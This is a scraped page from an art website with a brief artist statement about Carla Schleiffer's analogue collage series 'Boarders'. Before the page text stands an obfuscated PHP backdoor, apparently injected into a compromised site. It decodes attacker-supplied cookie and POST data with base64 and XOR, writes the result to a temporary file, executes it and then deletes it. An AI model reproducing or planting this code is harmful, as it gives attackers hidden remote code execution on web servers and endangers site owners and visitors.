$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Boarders by Carla Schleiffer – www.interferencechannel.com

Boarders by Carla Schleiffer

Using „Boarders“ as a theme for this project I took myself out of the context of my own environment along with animals i found in a petting zoo in an extremely urban setting. A juxtaposition between the animals and myself, is what i found broke my boarders and boarders of my photography so far. I made handcrafted analogue collages so that I could really play with the connections and had a physical power over my imagination.♦


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*Carla Schleiffer is a an artist from Germany. She is contributor of Interference since 2016.


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